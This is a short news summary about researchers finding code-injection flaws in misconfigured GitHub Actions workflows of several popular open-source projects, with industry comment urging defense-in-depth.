"Vulnerabilities Found in Popular Open-Source Projects on GitHub Could Impact Millions"
Cycode researchers discovered critical vulnerabilities in several popular open-source projects that could lead to a supply chain attack through the Continuous Integration (CI) process. According to the researchers, the vulnerabilities exist in misconfigured GitHub Actions workflows, which can affect millions of potential victims. The workflows were found to lack proper input sanitizing, thus allowing threat actors to inject code into builds through issues and comments, and to access privileged tokens. The most popular repositories found to be vulnerable include Liquibase, Dynamo BIM, FaunaDB, Wire, Astro, Kogito, and Ombi. While Log4j was making headlines over the past several months, over 4,000 high-severity vulnerabilities were announced, according to Ratan Tipirneni, the president and CEO at Tigera. Tipirneni highlighted that Cycode's recent discovery of critical vulnerabilities in popular open-source projects further indicates there will be an increase in vulnerabilities and threats as the pace of innovation in conjunction with the use of open-source libraries grows. This finding also presents an alarming sign for the highly constrained security and DevOps teams. Tipirneni pointed out that it is almost impossible for DevOps or security teams to keep up with the changing tactics of attackers. In order to address this security gap, businesses are urged to adopt a defense-in-depth approach. This article continues to discuss the Cycode researchers' discovery of critical vulnerabilities in open-source projects on GitHub and what businesses should do to actively mitigate security risks.